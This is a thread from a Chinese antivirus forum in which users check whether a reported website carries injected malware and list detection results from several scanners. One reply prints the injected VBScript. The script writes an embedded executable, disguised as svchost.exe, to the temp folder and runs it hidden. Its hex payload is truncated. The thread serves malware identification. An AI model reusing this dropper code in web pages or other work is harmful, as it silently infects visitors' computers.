搜索
楼主: juechao2000
收起左侧

[可疑文件] 求鉴定网站是否挂马?

  [复制链接]
ytysh
发表于 2018-3-4 13:56:36 | 显示全部楼层
Webroot Miss


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
JAYSIR
发表于 2018-3-4 14:39:12 | 显示全部楼层
卡巴报了,这么多报的估计也是有问题了
Kaspersky用户
发表于 2018-3-4 16:21:46 | 显示全部楼层
谷歌没反应,红伞本地杀了一个

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
辔繇
发表于 2018-3-4 17:24:03 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
curfew
发表于 2018-3-4 17:40:24 | 显示全部楼层
被挂马了
Virus.VBS.Ramnit.c
idxzsthl
发表于 2018-3-4 18:55:12 | 显示全部楼层
麦咖啡拦截。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kxmp
发表于 2018-3-4 19:20:24 | 显示全部楼层
本帖最后由 kxmp 于 2018-3-4 19:23 编辑

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
......
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

的确有个嵌入的文件 不过这个东西哪怕对新版本的ie都没用吧...

https://www.virustotal.com/zh-cn ... nalysis/1520162504/
WhiteCruel
发表于 2018-3-4 22:23:10 | 显示全部楼层
BD

Trojan.HTML.Ramnit.A
冰晶淑女
发表于 2018-3-5 09:06:54 | 显示全部楼层
火绒也报了
AIYYK
发表于 2018-3-5 10:12:15 来自手机 | 显示全部楼层
Yandex拦截

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|优惠券| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2018-6-23 00:53 , Processed in 0.037543 second(s), 3 queries , MemCached On.

快速回复 返回顶部 返回列表